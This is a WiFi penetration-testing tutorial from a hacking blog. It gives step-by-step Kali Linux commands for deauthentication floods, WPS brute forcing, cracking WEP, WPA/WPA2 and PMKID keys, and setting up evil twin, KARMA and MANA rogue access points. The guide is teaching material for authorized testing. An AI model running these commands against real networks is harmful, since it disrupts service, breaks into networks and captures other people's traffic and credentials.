πŸ•΅οΈ
VeryLazyTech
πŸ“œ MediumπŸ›’ My ShopπŸ‘Ύ GithubπŸ“© Telegram πŸ“Ί YouTubeβœ– Twitter
  • πŸ•΅οΈWelcome!
    • VeryLazyTech
    • Support VeryLazyTech
      • πŸ‘Ύ GitHub
      • πŸ“œ Medium
      • β˜• My Shop
      • πŸ“Ί YouTube
      • βœ– Twitter
      • πŸ“© Telegram
  • πŸ›‘οΈ Vulnerabilities and Exploits
    • CVE - POC
      • Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692
      • POC - CVE-2024–4956 - Nexus Repository Manager 3 Unauthenticated Path Traversal
      • POC - CVE-2024-45241: Path Traversal in CentralSquare's CryWolf
      • Telerik Auth Bypass CVE-2024-4358
      • Check Point Security Gateways Information Disclosure - CVE-2024-24919
      • CVE-2024-23897 - Jenkins File Read Vulnerability
      • CVE-2024–10914- Command Injection Vulnerability in name parameter for D-Link NAS
      • POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE)
      • CVE-2024-9935 - PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary
      • CVE-2024-50623- Cleo Unrestricted file upload and download
      • POC - WordPress File Upload plugin, in the wfu_file_downloader.php file before version <= 4.24.11
      • POC - Remote and unauthenticated attacker can send crafted HTTP requests to RCE - cve-2025-3248
      • POCβ€Š-β€ŠCVE-2025–2539 File Away <= 3.9.9.0.1β€Š-β€ŠMissing Authorization to Unauthenticated Arbitrary File
      • POC - CVE-2025-29306 FOXCMS /images/index.html Code Execution Vulnerability
  • πŸ•΅οΈβ€β™‚οΈDorks
    • GitHub Dorks
    • Google Dork Online Tool
  • πŸ“š Resources
    • Top Hacking Books for 2024: FREE and Paid
    • How to Study for OSCP with the PWK Book PDF
    • Top 20 phishing tools to use in 2024
    • Top 8 Bug Bounty Books for 2025: Must-Reads for Ethical Hackers
    • Top Hacking Tools and Skills You Need to Learn in 2025
    • Offensive Cloud
    • Penetration Testing & Hacking Tools List
    • Top Cybersecurity Books by Topic
  • The Ultimate Penetration Testing Methodology (2025 Edition)
  • πŸ•ΈοΈPentesting Web
    • Client Side Template Injection (CSTI)
    • Identify a Server’s Origin IP
    • 2FA/MFA/OTP Bypass
  • IDOR
  • Open Redirect
  • Subdomain Takeover
  • Penetration Testing WiFi Networks
  • Client-Side Path Traversal
  • Clickjacking
  • Command Injection
  • JWT Vulnerabilities
  • Bypass rating limit
  • CORS - Misconfigurations & Bypass
  • LDAP Injection
  • File upload vulnerabilities
  • Content Security Policy (CSP) bypass
  • 🐧Linux
    • Practical Linux Commands
    • Bypassing Bash Restrictions - Rbash
    • Privilege escalation - Linux
  • Linux Environment Variables
  • πŸͺŸWindows
    • Active Directory Methodology
  • 🌐Network Pentesting
    • FTP - Port 21
    • SSH- Port 22
    • Telnet - Port 23
    • SMTP/s - Port 25,465,587
    • WHOIS - Port 43
    • TACACS+ - Port 49
    • DNS - Port 53
    • TFTP/Bittorrent-tracker - Port 69/UDP
    • Finger - Port 79
    • Web - Port 80,443
    • Kerberos - Port 88
    • POP - Port 110/995
    • Portmapper - Port 111/TCP/UDP
    • Ident - Port 113
    • NTP - Port 123/UDP
    • MSRPC - Port 135, 539
    • NetBios - Port 137,138,139
    • SMB - Port 139 445
    • IMAP - Port 143, 993
    • SNMP - Ports 161, 162, 10161, and 10162/UDP
    • IRC - Ports 194,6667,6660-7000
    • Check Point Firewall - Port 264
    • LDAP - Ports 389, 636, 3268, 3269
    • IPsec/IKE VPN - Port 500/UDP
    • Modbus - Port 502
    • Rexec - Port 512
    • Rlogin - Port 513
    • Rsh - Port 514
    • Line Printer Daemon (LPD) - Port 515
    • Apple Filing Protocol (AFP) - PORT 548
    • RTSP - Port 554, 8554
    • IPMI - Port 623/UDP/TCP
    • Internet Printing Protocol (IPP) - Port 631
    • EPP - Port 700
    • Rsync - Port 873
    • Rusersd Service - Port 1026
    • Socks - Port 1080
    • Java RMI - RMI-IIOP - Port 1098/1099/1050
    • MSSQL (Microsoft SQL Server) - Port 1433
    • Oracle TNS Listener - Port 1521,1522-1529
  • PPTP - Port 1723
  • MQTT (Message Queuing Telemetry Transport) - Port 1883
  • Compaq HP Insight Manager - Port 2301, 2381
  • NFS Service - Port 2049
  • Docker - Port 2375,2376
  • Squid - Port 3128
  • iScsi - Port 3260
  • SAPRouter - Port 3299
  • 😎Post-exploitation
    • File Transfer Cheatsheet: Windows andΒ Linux
  • πŸ§‘β€πŸ”§Technical guides
    • Kali Linux - Installation
Powered by GitBook
On this page
  • Understanding WiFi Basics
  • WiFi Basics
  • Common WiFi Commands
  • Tools in Kali Linux for WiFi Pentesting
  • Types of WiFi Attacks
  • Denial of Service (DOS) Attacks
  • Deauthentication Attack
  • WPS Brute Force Attack
  • Cracking WEP
  • Cracking WPA/WPA2-PSK
  • PMKID Attack
  • WPA Enterprise (MGT) Attack
  • Client Attacks
  • Evil Twin Attack
  • KARMA Attack
  • MANA Attack
  • Loud MANA Attack
  • Wi-Fi Direct

Was this helpful?

Penetration Testing WiFi Networks

PreviousSubdomain TakeoverNextClient-Side Path Traversal

Last updated 2 months ago

Was this helpful?

  • Become VeryLazyTech ! 🎁

  • Follow us on:

    • βœ– Twitter .

    • πŸ‘Ύ Github .

    • πŸ“œ Medium .

    • πŸ“Ί YouTube .

    • πŸ“© Telegram .

    • πŸ•΅οΈβ€β™‚οΈ My Site .

  • Visit our for e-books and courses. πŸ“š

Wireless networks (WiFi) have become ubiquitous, facilitating seamless internet connectivity across devices. However, this convenience comes with significant security challenges. Penetration testing (pentesting) WiFi networks is crucial for identifying vulnerabilities and strengthening network defenses. This guide aims to provide a comprehensive step-by-step approach to WiFi pentesting, targeted at both beginners and intermediate users. We’ll cover essential WiFi commands, tools available in Kali Linux, and a variety of attacks to help you get started.

Understanding WiFi Basics

WiFi Basics

Before diving into pentesting, it’s essential to understand some basic WiFi concepts and commands. WiFi networks operate on different channels within the 2.4 GHz and 5 GHz bands. Each WiFi network is identified by its Service Set Identifier (SSID). The primary security protocols used in WiFi networks include WEP, WPA/WPA2-PSK, and WPA3.

Common WiFi Commands

Here are some fundamental commands used in WiFi pentesting:

  • ifconfig: Displays network interfaces and their configurations.

  • iwconfig: Similar to ifconfig but specifically for wireless interfaces.

  • airmon-ng: Used to manage wireless interfaces.

  • airodump-ng: Captures raw 802.11 frames.

  • aireplay-ng: Injects frames into a network.

  • aircrack-ng: Cracks WEP and WPA-PSK keys.

Tools in Kali Linux for WiFi Pentesting

Kali Linux is a go-to distribution for penetration testers due to its wide array of pre-installed tools. Here are some essential tools for WiFi pentesting:

  1. Aircrack-ng Suite: A set of tools for auditing wireless networks.

  2. Reaver: A tool for WPS brute force attacks.

  3. Wireshark: A network protocol analyzer.

  4. Wifite: An automated wireless attack tool.

  5. Bettercap: A network attack and monitoring tool.

  6. Kismet: A network detector, packet sniffer, and intrusion detection system.

Types of WiFi Attacks

Denial of Service (DOS) Attacks

DOS attacks aim to make a network unavailable to its intended users. One common method is by flooding the network with deauthentication packets.

Step-by-Step Guide for DOS Attack

  1. Set Up Monitor Mode:

airmon-ng start wlan0

2. Capture Packets:

airodump-ng wlan0mon

3. Send Deauthentication Packets:

aireplay-ng --deauth 0 -a [Router BSSID] wlan0mon

Deauthentication Attack

A deauthentication attack forces clients to disconnect from a network, which can be useful for capturing handshakes.

Performing a Deauthentication Attack

  1. Capture Handshake:

airodump-ng --bssid [Router BSSID] --channel [Channel] -w [Output file] wlan0mon

2. Send Deauth Packets:

aireplay-ng --deauth 10 -a [Router BSSID] -c [Client MAC] wlan0mon

WPS Brute Force Attack

WPS (WiFi Protected Setup) brute force attacks target the WPS PIN to gain access to the network.

Using Reaver for WPS Attack

  1. Start Monitor Mode:

airmon-ng start wlan0

2. Scan for WPS-Enabled Networks:

wash -i wlan0mon

3. Run Reaver:

reaver -i wlan0mon -b [Router BSSID] -vv

Cracking WEP

WEP is outdated and insecure, but some networks still use it. Cracking WEP involves capturing enough data packets to retrieve the encryption key.

Cracking WEP Step-by-Step

  1. Capture Data:

airodump-ng --bssid [Router BSSID] --channel [Channel] -w [Output file] wlan0mon

2. Inject ARP Packets:

aireplay-ng --arpreplay -b [Router BSSID] -h [Your MAC] wlan0mon

3. Crack the Key:

aircrack-ng [Output file]-01.cap

Cracking WPA/WPA2-PSK

Cracking WPA/WPA2-PSK involves capturing the handshake and using a dictionary attack to find the passphrase.

Capturing Handshake and Cracking WPA/WPA2-PSK

  1. Capture Handshake:

airodump-ng --bssid [Router BSSID] --channel [Channel] -w [Output file] wlan0mon

2. Send Deauth Packets:

aireplay-ng --deauth 10 -a [Router BSSID] -c [Client MAC] wlan0mon

3. Crack Handshake:

aircrack-ng -w [Wordlist] -b [Router BSSID] [Output file]-01.cap

PMKID Attack

The PMKID attack is a recent method that targets the RSN PMKID from a WPA2 handshake.

Executing a PMKID Attack

  1. Capture PMKID:

hcxdumptool -i wlan0mon -o [Output file] --enable_status=1

2. Convert PMKID:

hcxpcaptool -z [PMKID file] [Output file]

3. Crack PMKID:

hashcat -m 16800 -a 3 [PMKID file] [Wordlist]

WPA Enterprise (MGT) Attack

WPA Enterprise uses a RADIUS server for authentication. Attacking this involves capturing EAP packets and attempting to crack them.

Capturing EAP Packets

  1. Capture Packets:

airodump-ng --bssid [Router BSSID] --channel [Channel] -w [Output file] wlan0mon

2. Deauth Client:

aireplay-ng --deauth 10 -a [Router BSSID] -c [Client MAC] wlan0mon

3. Crack EAP:

asleap -r [Output file]-01.cap -W [Wordlist]

Client Attacks

Client attacks target the devices connected to a WiFi network rather than the access point itself. These can include exploiting vulnerabilities in the client devices or manipulating their connections.

Setting Up a Simple AP with Redirection to the Internet

  1. Create a Hostapd Configuration File:

interface=wlan0 driver=nl80211 ssid=TestAP channel=1

2. Start Hostapd:

hostapd /etc/hostapd/hostapd.conf

3. Set Up NAT:

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sysctl -w net.ipv4.ip_forward=1

Evil Twin Attack

An Evil Twin attack involves setting up a rogue access point with the same SSID as the target network to trick clients into connecting to it.

Setting Up an Evil Twin

  1. Create Fake AP:

airbase-ng -e [SSID] -c [Channel] wlan0mon

2. Set Up NAT:

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sysctl -w net.ipv4.ip_forward=1

KARMA Attack

The KARMA attack exploits the tendency of devices to automatically connect to known networks. By broadcasting SSIDs that devices have previously connected to, an attacker can lure devices into connecting.

Performing a KARMA Attack

  1. Set Up KARMA AP:

bettercap -iface wlan0 --wifi-ap.ssid "FreeWifi" --wifi-ap.karma

MANA Attack

MANA is an enhanced version of the KARMA attack, with additional capabilities for capturing credentials.

Executing a MANA Attack

  1. Start MANA:

hostapd-mana /etc/hostapd-mana.conf

2. Capture Traffic:

tcpdump -i wlan0 -w mana.pcap

Loud MANA Attack

Loud MANA is an aggressive variant of the MANA attack, designed to forcefully deauthenticate clients from legitimate APs to connect to the rogue AP.

Performing a Loud MANA Attack

  1. Start Loud MANA:

hostapd-mana /etc/hostapd-mana-loud.conf

2. Capture Traffic:

tcpdump -i wlan0 -w loud-mana.pcap

Known Beacons Attack

In this attack, beacons of well-known networks are broadcasted to deceive clients into connecting.

Executing a Known Beacons Attack

  1. Broadcast Known Beacons:

mdk3 wlan0 b -v [SSID list file]

Wi-Fi Direct

Wi-Fi Direct allows devices to connect directly without a router. Attacking Wi-Fi Direct involves exploiting vulnerabilities in the protocol or connected devices.

Wi-Fi Direct Pentesting

  1. Discover Wi-Fi Direct Devices:

wpa_cli p2p_find

2. Connect to a Device:

wpa_cli p2p_connect [Device MAC] pbc

Pentesting WiFi networks is an essential skill for identifying and mitigating security risks. By following the comprehensive steps and utilizing the tools outlined in this guide, beginners and intermediate users can effectively assess the security of wireless networks. Always ensure to have proper authorization before conducting any pentesting activities and use these skills responsibly to improve network security.

Photo by on
member
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
shop
Paul Hanaoka
Unsplash
πŸ”₯ Best Seller πŸ”₯ - The Ultimate Wifi Hacking Bundle - 2 E-booksGumroad
Logo